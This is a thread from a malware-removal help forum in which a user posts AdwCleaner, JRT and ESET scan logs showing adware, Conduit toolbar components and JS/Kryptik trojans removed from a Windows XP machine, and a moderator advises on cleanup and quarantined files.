Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4634A024-1754-4A6D-B4C0-4968168E3B7B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{304E71B8-633E-4C36-996A-7D21D9D1518F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{93EC97BF-FE43-4BCA-A735-5C5D6A0A40C4}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{304E71B8-633E-4C36-996A-7D21D9D1518F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{93EC97BF-FE43-4BCA-A735-5C5D6A0A40C4}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{4634A024-1754-4A6D-B4C0-4968168E3B7B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8856F9B5-8BAB-4F4A-A3CF-E4F2B4A064B7}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{145C55D0-AE5A-4782-B5E6-3E774B24F1EC}
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{93EC97BF-FE43-4BCA-A735-5C5D6A0A40C4}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{93EC97BF-FE43-4BCA-A735-5C5D6A0A40C4}]
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\DefaultTab
Key Deleted : HKCU\Software\IM
Key Deleted : HKCU\Software\ImInstaller
Key Deleted : HKCU\Software\SmartBar
Key Deleted : HKCU\Software\wecarereminder
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\SweetPacks_A5
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\Software\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\Conduit
Key Deleted : HKLM\Software\SearchProtect
Key Deleted : HKLM\Software\Viewpoint
Key Deleted : HKLM\Software\wnlt
Key Deleted : HKLM\Software\SweetPacks_A5

***** [ Browsers ] *****

-\\ Internet Explorer v8.0.6001.18702


-\\ Mozilla Firefox v27.0.1 (en-US)

[ File : C:\Documents and Settings\LocalService\Application Data\Mozilla\Firefox\Profiles\s718l8fc.default\prefs.js ]


[ File : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\prefs.js ]

Line Deleted : user_pref("CT3314312.FF19Solved", "true");
Line Deleted : user_pref("CT3314312.UserID", "UN80889145624715380");
Line Deleted : user_pref("CT3314312.browser.search.defaultthis.engineName", "true");
Line Deleted : user_pref("CT3314312.fullUserID", "UN80889145624715380.IN.20131016175509");
Line Deleted : user_pref("CT3314312.installDate", "16/10/2013 17:55:13");
Line Deleted : user_pref("CT3314312.installSessionId", "{5F4D2349-01D8-4E6F-991B-3504C1D6020B}");
Line Deleted : user_pref("CT3314312.installSp", "TRUE");
Line Deleted : user_pref("CT3314312.installerVersion", "1.7.1.7");
Line Deleted : user_pref("CT3314312.keyword", "true");
Line Deleted : user_pref("CT3314312.originalHomepage", "hxxp://att.my.yahoo.com/");
Line Deleted : user_pref("CT3314312.originalSearchAddressUrl", "");
Line Deleted : user_pref("CT3314312.originalSearchEngine", "XFINITY");
Line Deleted : user_pref("CT3314312.originalSearchEngineName", "XFINITY");
Line Deleted : user_pref("CT3314312.searchRevert", "false");
Line Deleted : user_pref("CT3314312.searchUserMode", "2");
Line Deleted : user_pref("CT3314312.smartbar.homepage", "true");
Line Deleted : user_pref("CT3314312.versionFromInstaller", "10.20.3.20");
Line Deleted : user_pref("CT3314312.xpeMode", "0");
Line Deleted : user_pref("Smartbar.ConduitHomepagesList", "hxxp://search.conduit.com/?ctid=CT3314312&octid=CT3314312&SearchSource=61&CUI=UN80889145624715380&UM=2&UP=SPCC51B416-8F66-4545-A3BF-662FF87F05A0");
Line Deleted : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "");
Line Deleted : user_pref("browser.download.lastDir", "C:\\Documents and Settings\\Roland\\My Documents\\My Webs\\myweb");
Line Deleted : user_pref("browser.search.defaultenginename", "SweetPacks A5 Customized Web Search");
Line Deleted : user_pref("browser.search.defaultthis.engineName", "SweetPacks A5 Customized Web Search");
Line Deleted : user_pref("browser.search.defaulturl", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3314312&CUI=UN80889145624715380&UM=2&SearchSource=3&q={searchTerms}");
Line Deleted : user_pref("browser.search.selectedEngine", "SweetPacks A5 Customized Web Search");
Line Deleted : user_pref("keyword.URL", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3314312&SearchSource=2&CUI=UN80889145624715380&UM=2&q=");
Line Deleted : user_pref("smartbar.addressBarOwnerCTID", "CT3314312");
Line Deleted : user_pref("smartbar.conduitHomepageList", "hxxp://search.conduit.com/?ctid=CT3314312&CUI=UN80889145624715380&UM=2&SearchSource=13,hxxp://search.conduit.com/?ctid=CT3314312&octid=CT3314312&SearchSource[...]
Line Deleted : user_pref("smartbar.conduitSearchAddressUrlList", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3314312&SearchSource=2&CUI=UN80889145624715380&UM=2&q=");
Line Deleted : user_pref("smartbar.defaultSearchOwnerCTID", "CT3314312");
Line Deleted : user_pref("smartbar.homePageOwnerCTID", "CT3314312");
Line Deleted : user_pref("smartbar.machineId", "/MT6XVNITSKR2FPNNENZT9JOIYKUDNWYUOFW8XGJYRXBPZWMWXK+8A9/WZL36ABY47QTUZESLTMGPXU5HSXTNG");
Line Deleted : user_pref("smartbar.originalHomepage", "hxxp://search.conduit.com/?ctid=CT3314312&CUI=UN80889145624715380&UM=2&SearchSource=13");

[ File : C:\Documents and Settings\Lynne\Application Data\Mozilla\Firefox\Profiles\z72x27iq.default\prefs.js ]


[ File : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\m44p6sa5.default\prefs.js ]


*************************

AdwCleaner[R0].txt - [10745 octets] - [27/03/2014 18:14:37]
AdwCleaner[S0].txt - [10757 octets] - [27/03/2014 18:40:18]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [10818 octets] ##########
 



#6 cinerama

cinerama
  • Topic Starter

  • Members
  • 83 posts
  • OFFLINE
  •  
  • Local time:05:50 PM

Posted 27 March 2014 - 06:36 PM

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.3 (03.23.2014:1)
OS: Microsoft Windows XP x86
Ran by Roland on Thu 03/27/2014 at 19:15:54.48
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\yt.ytnavassistplugin
Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\yt.ytnavassistplugin.1
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{180780f0-b348-4b44-8210-94a8f3ee15b2}
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{46C9CE0D-7746-4A71-896C-E7B56079E90B}
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{D3C46456-6D3A-4FAE-A46F-25FF20582283}



~~~ Files

Successfully deleted: [File] "C:\Program Files\mozilla firefox\plugins\npcouponprinter.dll"



~~~ Folders

Successfully deleted: [Folder] "C:\Program Files\coupons"



~~~ FireFox

Emptied folder: C:\Documents and Settings\Roland\Application Data\mozilla\firefox\profiles\eeah4ch5.default\minidumps [4 files]





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 03/27/2014 at 19:22:41.14
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 



#7 cinerama

cinerama
  • Topic Starter

  • Members
  • 83 posts
  • OFFLINE
  •  
  • Local time:05:50 PM

Posted 27 March 2014 - 09:04 PM

C:\Documents and Settings\Roland\My Documents\couponprinter.exe    probably a variant of Win32/Adware.Softomate.AD application    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\041665.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\053159.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\101158mobileunit.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150031567.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150042667.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150071967.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150081865.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150102765.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501027652.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501967april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501967february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501967march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501967may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150ap.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150dallas.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150movies.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150patton.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150promotion.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150tech.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150theatres.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150thebible.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150ua.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953deluxe.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_august.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_december.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_october.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1954_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1955_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1956_february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1956_June.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1956_Sept.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1957_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1957_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1957_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1958_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1958_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1958_october.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1959_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1959_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1960_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1960_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961interama.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961_april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962holidayad.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbgad.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbgcredits.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbgdragon.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbgfirstpage.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbghorses.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_august.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_december.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_January.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_october.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_august.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_december.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_october.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964cineramaweekend.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_august.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_December.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
 



#8 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,331 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:05:50 PM

Posted 28 March 2014 - 02:54 PM

This older version can be exploited, so remove it thru Control Panel
Java™ 6 Update 20 (Version: 6.0.200)

All the Krytic were exploits and removed

Empty your temp folders using TFC (Temporary File Cleaner)
  • Please download TFC by Old Timer and save it to your desktop.
    alternate download link
  • Save any unsaved work. (TFC will close ALL open programs including your browser!)
  • Double-click on TFC.exe to run it. (If you are using Vista, right-click on the file and choose "Run As Administrator".)
  • Click the Start button to begin the cleaning process and let it run uninterrupted to completion.
  • Important! If TFC prompts you to reboot, please do so immediately. If not prompted, manually reboot the machine anyway allowing Windows to load normally (not into Safe Mode) to ensure a complete clean.
Looks clean.
How is it now?
How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook

#9 cinerama

cinerama
  • Topic Starter

  • Members
  • 83 posts
  • OFFLINE
  •  
  • Local time:05:50 PM

Posted 30 March 2014 - 09:05 AM

I think that did it! I need to recreate those files that were deleted and see if the web site is OK



#10 cinerama

cinerama
  • Topic Starter

  • Members
  • 83 posts
  • OFFLINE
  •  
  • Local time:05:50 PM

Posted 30 March 2014 - 09:06 AM

Are those files that were deleted available anywhere?



#11 cinerama

cinerama
  • Topic Starter

  • Members
  • 83 posts
  • OFFLINE
  •  
  • Local time:05:50 PM

Posted 30 March 2014 - 12:11 PM

I forgot to do the following on Eset:

  • Scan potentially unwanted applications
  • Scan for potentially unsafe applications
  • Enable Anti-Stealth technology

Do I select delete files quarantined?

 

It came up with the following when I ran ESET again

 

C:\AdwCleaner\Backup\C\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\prefs_27_03_2014_18_40_29.js    JS/SecurityDisabler.A.Gen potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\user.js.vir    JS/SecurityDisabler.A.Gen potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5\hk64tbSwee.dll.vir    a variant of Win64/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5\hktbSwee.dll.vir    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5\ldrtbSwee.dll.vir    a variant of Win32/Toolbar.Conduit.P potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5\tbSwee.dll.vir    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Program Files\Mozilla Firefox\browser\nsprotector.js.vir    Win32/Conduit.SearchProtect.A potentially unwanted application    deleted - quarantined
C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\prefs.js    JS/SecurityDisabler.A.Gen potentially unwanted application    deleted - quarantined
C:\Documents and Settings\Roland\My Documents\freeonlinetvplayer.exe    a variant of Win32/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\Documents and Settings\Roland\My Documents\Downloads\KeyFinderInstaller(1).exe    Win32/OpenCandy potentially unsafe application    deleted - quarantined
C:\Documents and Settings\Roland\My Documents\Downloads\KeyFinderInstaller.exe    Win32/OpenCandy potentially unsafe application    deleted - quarantined
C:\i386\dmwu.exe    a variant of Win32/Toolbar.Perion.G potentially unwanted application    deleted - quarantined
C:\i386\wrtc.exe    a variant of Win32/Toolbar.Perion.G potentially unwanted application    deleted - quarantined
C:\Program Files\Trend Micro\HiJackThis\backups\backup-20100718-090326-719.dll    a variant of Win32/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\SDFix\apps\Process.exe    Win32/PrcView potentially unsafe application    deleted - quarantined
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP535\A0109401.dll    a variant of Win64/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP535\A0109402.dll    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP535\A0109403.dll    a variant of Win32/Toolbar.Conduit.P potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP535\A0109404.dll    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
 



#12 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,331 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:05:50 PM

Posted 30 March 2014 - 05:09 PM

Which deleted files?

If the machine is running fine you can delete the ESET findings, otherwise they are OK quarantined as they cannot harm the PC there.
How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users